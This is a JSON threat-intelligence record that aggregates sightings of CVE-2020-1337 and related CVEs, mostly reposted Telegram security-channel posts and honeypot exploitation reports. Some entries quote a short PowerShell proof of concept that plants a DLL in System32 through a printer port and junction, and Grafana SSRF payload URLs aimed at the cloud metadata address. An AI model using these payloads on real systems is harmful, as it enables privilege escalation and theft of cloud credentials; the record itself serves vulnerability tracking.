{"vulnerability": "CVE-2020-1337", "sightings": [{"uuid": "3bb3ce47-caf1-4c89-9afa-602c91f40dd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1337", "type": "seen", "source": "MISP/61d5601d-105b-446b-bd1b-9ca53e073728", "content": "", "creation_timestamp": "2024-11-14T06:07:37.000000Z"}, {"uuid": "0f7dc53a-8bd3-4f7d-9d58-dedf032048cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1337", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:44.000000Z"}, {"uuid": "56a08b08-fa4b-420c-b30c-1c00c597529e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1337", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:23.000000Z"}, {"uuid": "735ab90c-9e7b-4679-ad96-3672709740ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-09)", "content": "", "creation_timestamp": "2025-03-09T00:00:00.000000Z"}, {"uuid": "385478a7-0ec8-4b3d-9c39-2aa12f7d27c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-24)", "content": "", "creation_timestamp": "2025-03-24T00:00:00.000000Z"}, {"uuid": "a9508ade-7494-414d-abeb-82788d211c30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1337", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb", "content": "", "creation_timestamp": "2021-01-15T18:21:17.000000Z"}, {"uuid": "59da4623-b494-44cf-a8ff-7742a5928c17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1337", "type": "published-proof-of-concept", "source": "https://t.me/cKure/1791", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 CVE-2020-1337 is CVE-2020-1048 (aka PrintDemon) with a TOCTOU.\n\nPoC:\nmkdir C:\\test\nAdd-PrinterPort -Name c:\\test\\ualapi.dll\nNew-Item -Type Junction -Path C:\\test -Value C:\\Windows\\System32\n\nhttps://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/", "creation_timestamp": "2020-08-11T20:41:51.000000Z"}, {"uuid": "b2e3fbf3-8129-411f-be04-dff6f2e7dfee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "published-proof-of-concept", "source": "https://t.me/cKure/1649", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 CVE-2020-13379: Unauthenticated SSRF in Grafana\n\nhttps://rhynorater.github.io/CVE-2020-13379-Write-Up\n\nPoC 1: avatar/tesdt%3Fd=http://redirect.rhynorater.com%25253f%253b%http://252fbp.blogspot.com%252f169.254.169.254\n\nPoC 2: \navatar/0%3fd%3dhttps%3A%252F%252F${BURPCOL}%25253A443%25253f%http://252Fimgur.com%252F", "creation_timestamp": "2020-08-03T04:31:10.000000Z"}, {"uuid": "c9da99e6-f8d5-49f6-bfc0-9eb48ca8d970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "published-proof-of-concept", "source": "https://t.me/cKure/10284", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 CVE-2020-13379: Unauthenticated Full-Read SSRF in Grafana.\n\nhttps://rhynorater.github.io/CVE-2020-13379-Write-Up", "creation_timestamp": "2022-10-06T05:30:26.000000Z"}, {"uuid": "7415de70-e577-437d-a1cb-6a4a7aedabf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13377", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2920", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2020-13377\n\ud83d\udd39 Description: The web-services interface of Loadbalancer.org Enterprise VA MAX through 8.3.8 could allow an authenticated, remote, low-privileged attacker to conduct directory traversal attacks and obtain read and write access to sensitive files.\n\ud83d\udccf Published: 2023-05-12T00:00:00.000Z\n\ud83d\udccf Modified: 2025-01-24T15:49:36.413Z\n\ud83d\udd17 References:\n1. https://www.loadbalancer.org/products/virtual/enterprise-va-max/\n2. https://inf0seq.github.io/cve/2020/04/21/Path-Traversal-in-Enterprise-loadbalancer-VA-MAX-v8.3.8-and-earlier.html", "creation_timestamp": "2025-01-24T16:04:42.000000Z"}, {"uuid": "a40f0ef2-5e06-4dd6-81d6-08cae299d0da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13378", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2922", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2020-13378\n\ud83d\udd39 Description: Loadbalancer.org Enterprise VA MAX through 8.3.8 has an OS Command Injection vulnerability that allows a remote authenticated attacker to execute arbitrary code.\n\ud83d\udccf Published: 2023-05-12T00:00:00.000Z\n\ud83d\udccf Modified: 2025-01-24T15:46:55.115Z\n\ud83d\udd17 References:\n1. https://www.loadbalancer.org/products/virtual/enterprise-va-max/\n2. https://inf0seq.github.io/cve/2020/04/21/OS.html", "creation_timestamp": "2025-01-24T16:04:44.000000Z"}, {"uuid": "18f3a2a7-501d-4dbf-958b-9959451e5e82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "published-proof-of-concept", "source": "https://t.me/infosec1z/47", "content": "\ud83d\udd30Top 10 vulnerabilities in 2020:\n\n 1. CVE-2020-12720: vBulletin SQL Injection (OWASP 1: Injection)\n\n 2. CVE-2020-5902: F5 BIG IP RCE and LFI (OWASP 1: Injection)\n\n\ud83c\udfa5 CVE PoC videos\n\nhttps://youtu.be/-ppzdYDk-ZM\n\nhttps://youtube.com/playlist?list=PLiVfOzljj-46iFcif16qMaPP84ZxCZ4Mb\n\n\n\n 3. CVE-2020-15506: MobileIron Core Authentication Bypass\n (OWASP 2: Broken Authentication)\n\n 4. CVE-2020-14882: Oracle WebLogic RCE (OWASP 1: Injection)\n\n 5. CVE-2020-14750: Oracle WebLogic RCE (OWASP 1: Injection)\n\n 6. CVE-2020-17530: Apache Struts 2 RCE (OWASP 1: Injection)\n\n\ud83c\udfa5 CVE PoC videos\n\nhttps://youtu.be/MUAAwijvAe8\n\n\n 7. CVE-2020-2551: Oracle WebLogic RCE (OWASP 1: Injection)\n\n 8. CVE-2020-13379: Grafana SSRF\n (OWASP 3: Broken Access Control)\n\n 9. CVE-2020-1147: Microsoft SharePoint Server RCE\n (OWASP 1: Injection)\n\n 10. CVE-2020-8209: Citrix XenMobile Server Path Traversal\n (OWASP 3: Broken Access Control)\n\n\n\u2796\u2796 @infosec1z \u2796\u2796", "creation_timestamp": "2021-09-05T16:58:17.000000Z"}, {"uuid": "0c27864f-7d72-4def-9b8c-390a8bd630d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1337", "type": "seen", "source": "https://t.me/proxy_bar/748", "content": "Windows Privilege Escalation: SpoolFool\n\u041f\u0430\u0442\u0447\u0438\u043b\u0438, \u0444\u0438\u043a\u0441\u0438\u043b\u0438  CVE-2020-1048 \u0438  CVE-2020-1337, \u0430 \u0434\u044b\u0440\u0430 \u043e\u0441\u0442\u0430\u043b\u0430\u0441\u044c.\n\u041e\u0442\u043b\u0438\u0447\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-21999 (\u00abSpoolFool\u00bb) \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0440\u0430\u0432\u0430 NT AUTHORITY\\\\SYSTEM. \u0412 \u0441\u0442\u0430\u0442\u044c\u0435 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u044b 2 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430 \u0430\u0442\u0430\u043a\u0438. \n\u041a\u0430\u043a \u043f\u0440\u043e\u043b\u0435\u0437\u0442\u044c \u0432 \u043c\u0438\u0440 \u043f\u0440\u0438\u043d\u0442\u0435\u0440\u043e\u0432 \u0431\u0435\u0437 \u0432\u0430\u0437\u0435\u043b\u0438\u043d\u0430, \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0435\u0442 \u0440\u0430\u0441\u043e\u0432\u043e \u0432\u0435\u0440\u043d\u044b\u0439 \u0438\u043d\u0434\u0443\u0441 Harshit Rajpal\n\u0427\u0438\u0442\u0430\u0435\u043c \u0442\u0443\u0442.\n#windows #LPE", "creation_timestamp": "2022-03-25T16:36:11.000000Z"}, {"uuid": "e58f8cfa-762c-4422-a355-4e83571e5a4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "published-proof-of-concept", "source": "Telegram/Uoa-03OsM6RXf0msSgaaKWDiagq8ZDgbKZrQ7CTvgTImxA", "content": "", "creation_timestamp": "2020-09-09T06:35:17.000000Z"}, {"uuid": "9fe97f95-6e38-4796-b920-db157993e62a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13377", "type": "seen", "source": "https://t.me/cibsecurity/63996", "content": "\u203c CVE-2020-13377 \u203c\n\nThe web-services interface of Loadbalancer.org Enterprise VA MAX through 8.3.8 could allow an authenticated, remote, low-privileged attacker to conduct directory traversal attacks and obtain read and write access to sensitive files.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-05-12T14:26:49.000000Z"}, {"uuid": "f15075eb-8be7-4540-93a3-b6290839fa24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1337", "type": "seen", "source": "https://t.me/reverse_dungeon/1515", "content": "Windows Privilege Escalation: SpoolFool\n\u041f\u0430\u0442\u0447\u0438\u043b\u0438, \u0444\u0438\u043a\u0441\u0438\u043b\u0438  CVE-2020-1048 \u0438  CVE-2020-1337, \u0430 \u0434\u044b\u0440\u0430 \u043e\u0441\u0442\u0430\u043b\u0430\u0441\u044c.\n\u041e\u0442\u043b\u0438\u0447\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-21999 (\u00abSpoolFool\u00bb) \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0440\u0430\u0432\u0430 NT AUTHORITY\\\\SYSTEM. \u0412 \u0441\u0442\u0430\u0442\u044c\u0435 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u044b 2 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430 \u0430\u0442\u0430\u043a\u0438. \n\u041a\u0430\u043a \u043f\u0440\u043e\u043b\u0435\u0437\u0442\u044c \u0432 \u043c\u0438\u0440 \u043f\u0440\u0438\u043d\u0442\u0435\u0440\u043e\u0432 \u0431\u0435\u0437 \u0432\u0430\u0437\u0435\u043b\u0438\u043d\u0430, \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0435\u0442 \u0440\u0430\u0441\u043e\u0432\u043e \u0432\u0435\u0440\u043d\u044b\u0439 \u0438\u043d\u0434\u0443\u0441 Harshit Rajpal\n\u0427\u0438\u0442\u0430\u0435\u043c \u0442\u0443\u0442.\n#windows #LPE", "creation_timestamp": "2022-03-25T16:16:29.000000Z"}, {"uuid": "19352223-c66b-430f-a04b-f843b9ac0103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1337", "type": "seen", "source": "https://t.me/pwnwiki_zhchannel/561", "content": "CVE-2020-1337 Microsoft Spooler \u672c\u5730\u6b0a\u9650\u63d0\u5347\u6f0f\u6d1e\nhttps://www.pwnwiki.org/index.php?title=CVE-2020-1337_Microsoft_Spooler_%E6%9C%AC%E5%9C%B0%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E", "creation_timestamp": "2021-05-31T04:07:35.000000Z"}, {"uuid": "6c7098a0-7e8b-4f8b-9ee3-03ea68ce5c96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1337", "type": "published-proof-of-concept", "source": "https://t.me/HackerOne/2688", "content": "https://github.com/VoidSec/CVE-2020-1337", "creation_timestamp": "2020-08-12T22:24:03.000000Z"}, {"uuid": "83c88915-bea5-42ef-983c-f8b00bf26059", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1337", "type": "seen", "source": "https://t.me/SecLabNews/8336", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438\u00a0\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438\u00a0\u0441\u043f\u043e\u0441\u043e\u0431 \u043e\u0431\u043e\u0439\u0442\u0438 \u043f\u0430\u0442\u0447, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0435\u0439 Microsoft \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 (\u00a0CVE-2020-1048\u00a0) \u0432 \u0441\u043b\u0443\u0436\u0431\u0430\u0445 \u043f\u0435\u0447\u0430\u0442\u0438 Windows, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438 \u041f\u0435\u043b\u0435\u0433\u043e\u043c \u0425\u0430\u0434\u0430\u0440\u043e\u043c (Peleg Hadar) \u0438 \u0422\u043e\u043c\u0435\u0440\u043e\u043c \u0411\u0430\u0440\u043e\u043c (Tomer Bar) \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 SafeBreach Labs. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440 \u043e\u0447\u0435\u0440\u0435\u0434\u0438 \u043f\u0435\u0447\u0430\u0442\u0438 Windows, \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u043c \u043f\u0435\u0447\u0430\u0442\u0438. \u041e\u0431\u0445\u043e\u0434 \u044d\u0442\u043e\u0439 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u044b\u043b \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d \u043a\u0430\u043a \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 (CVE-2020-1337)\n\n\nhttps://www.securitylab.ru/news/510910.php", "creation_timestamp": "2020-08-13T19:18:01.000000Z"}, {"uuid": "2a71ccff-c108-492a-b6e3-5c22d0772f69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/4526", "content": "CVE-2020-13379\nUnauthenticated Full-Read SSRF in Grafana https://rhynorater.github.io/CVE-2020-13379-Write-Up", "creation_timestamp": "2020-08-01T19:07:21.000000Z"}, {"uuid": "1c368812-4b15-4d82-9c2a-5c36b8525240", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/1515", "content": "#exploit\nCVE-2020-13379:\nUnauthenticated Full-Read SSRF in Grafana 3.0.1 - 7.0.1\nhttps://rhynorater.github.io/CVE-2020-13379-Write-Up\nPoC:\n/avatar/tesdt%3Fd=http://redirect.rhynorater.com%25253f%253b%http://252fbp.blogspot.com%252f169.254.169.254", "creation_timestamp": "2021-10-27T03:12:46.000000Z"}, {"uuid": "87055aa1-0e42-43e6-b761-0f0bb9045bf7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/3104", "content": "#Analytics\n10 most exploited vulnerabilities of the week (April 5-11)\nCVE-2021-26855 - ProxyLogon MS Exchange Srv RCE\nhttps://t.me/cybersecuritytechnologies/2835\nCVE-2020-13379 - Unauth Full-Read SSRF in Grafana\nhttps://t.me/cybersecuritytechnologies/1515\nCVE-2021-24086 - Win IPv4/6 Stack RCE/DoS Vulns\nhttps://unit42.paloaltonetworks.com/cve-2021-24074-patch-tuesday\nCVE-2021-26411 - IE mshtml UAF\nhttps://t.me/cybersecuritytechnologies/2908\nCVE-2021-3129 - Laravel debug RCE\nhttps://t.me/cybersecuritytechnologies/2557\nCVE-2021-26708 - LPE in the Linux kernel &lt;5.10.x\nhttps://github.com/jordan9001/vsock_poc\nCVE-2020-16040 - V8 JIT Compiler Bug\nhttps://t.me/cybersecuritytechnologies/2450\nCVE-2021-21982 - SSRF in VMWare\nhttps://t.me/cybersecuritytechnologies/3039\nCVE-2021-21402 - UAF read in Jellyfin\nhttps://t.me/cybersecuritytechnologies/3064\nCVE-2021-29154 - BPF JIT bug\nhttps://www.openwall.com/lists/oss-security/2021/04/08/1", "creation_timestamp": "2021-04-12T11:01:12.000000Z"}, {"uuid": "c374bfdd-c16b-4327-831c-c7d256433d38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1337", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1571", "content": "CVE-2020-1337 is CVE-2020-1048 (aka PrintDemon)\nwith a bypass of PrintDemon\u2019s recent patch via a Junction Directory (TOCTOU)\nPoC:\nmkdir C:\\test\nAdd-PrinterPort -Name c:\\test\\ualapi.dll\nNew-Item -Type Junction -Path C:\\test -Value C:\\Windows\\System32\n1. https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/\n2. https://www.zerodayinitiative.com/blog/2020/8/11/windows-print-spooler-patch-bypass-re-enables-persistent-backdoor", "creation_timestamp": "2020-08-12T11:03:01.000000Z"}, {"uuid": "1d046c07-529a-4735-8a66-93c893a1d366", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/3159", "content": "#Analytics\n10 most exploited vulnerabilities of the week (April 12-18)\nCVE-2020-13379 - Unauth Full-Read SSRF in Grafana\nhttps://t.me/cybersecuritytechnologies/1515\nCVE-2021-24086 - Win IPv4/6 Stack RCE/DoS Vulns\nhttps://unit42.paloaltonetworks.com/cve-2021-24074-patch-tuesday\nCVE-2021-1647 - MS Defender RCE Vulnerability\nhttps://www.anquanke.com/post/id/231625\nCVE-2021-28310 - Win32k Elevation of Privilege Vulnerability\nhttps://t.me/cybersecuritytechnologies/3124\nCVE-2021-24027 - Remote exploitation of a man-in-the-disk vulnerability in WhatsApp\nhttps://t.me/cybersecuritytechnologies/3126\nCVE-2021-28480/28481/28482/28483 - MS Exchange Server RCE Vulnerability\nhttps://www.tenable.com/blog/cve-2021-28480-cve-2021-28481-cve-2021-28482-cve-2021-28483-four-critical-microsoft-exchange\nCVE-2021-28316 - Windows WLAN AutoConfig Service Security Feature Bypass Vulnerability\nhttps://t.me/cybersecuritytechnologies/3156", "creation_timestamp": "2021-04-19T11:01:18.000000Z"}, {"uuid": "bbe51f93-838f-4bd1-b59d-7d455d7399bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/3279", "content": "#Analytics\nTop 10 Most Used Vulnerabilities of the Month (April 1-30)\n\nCVE-2020-13379 - Unauth Full-Read SSRF in Grafana\nhttps://t.me/cybersecuritytechnologies/1515\nCVE-2021-24086 - Win IPv4/6 Stack RCE/DoS Vulns\nhttps://unit42.paloaltonetworks.com/cve-2021-24074-patch-tuesday\nCVE-2021-22893 Pulse SecureVPN RCE\nhttps://t.me/cybersecuritytechnologies/3185\nCVE-2021-28310 - Win32k EoP Vulnerability\nhttps://t.me/cybersecuritytechnologies/3124\nCVE-2021-26411 - IE mshtml UAF\nhttps://t.me/cybersecuritytechnologies/2908\nCVE-2021-22204 - DjVu improper neutralization of user data\nhttps://github.com/exiftool/exiftool/commit/cf0f4e7dcd024ca99615bfd1102a841a25dde031#diff-fa0d652d10dbcd246e6b1df16c1e992931d3bb717a7e36157596b76bdadb3800\nCVE-2021-24027 - Remote exploitation of a man-in-the-disk vulnerability in WhatsApp\nhttps://t.me/cybersecuritytechnologies/3126\nCVE-2021-28316 - Windows WLAN AutoConfig Service Security Feature Bypass Vulnerability\nhttps://t.me/cybersecuritytechnologies/3156\nCVE-2021-28480/28482 - MS Exchange Server RCE\nhttps://www.tenable.com/blog/cve-2021-28480-cve-2021-28481-cve-2021-28482-cve-2021-28483-four-critical-microsoft-exchange", "creation_timestamp": "2024-04-30T17:11:44.000000Z"}, {"uuid": "99b0b623-77b8-42c0-b6c8-16e15ca762a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13376", "type": "seen", "source": "https://t.me/cibsecurity/13984", "content": "ATENTION\u203c New - CVE-2020-13376\n\nSecurEnvoy SecurMail 9.3.503 allows attackers to upload executable files and achieve OS command execution via a crafted SecurEnvoyReply cookie.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-08-08T00:55:26.000000Z"}]}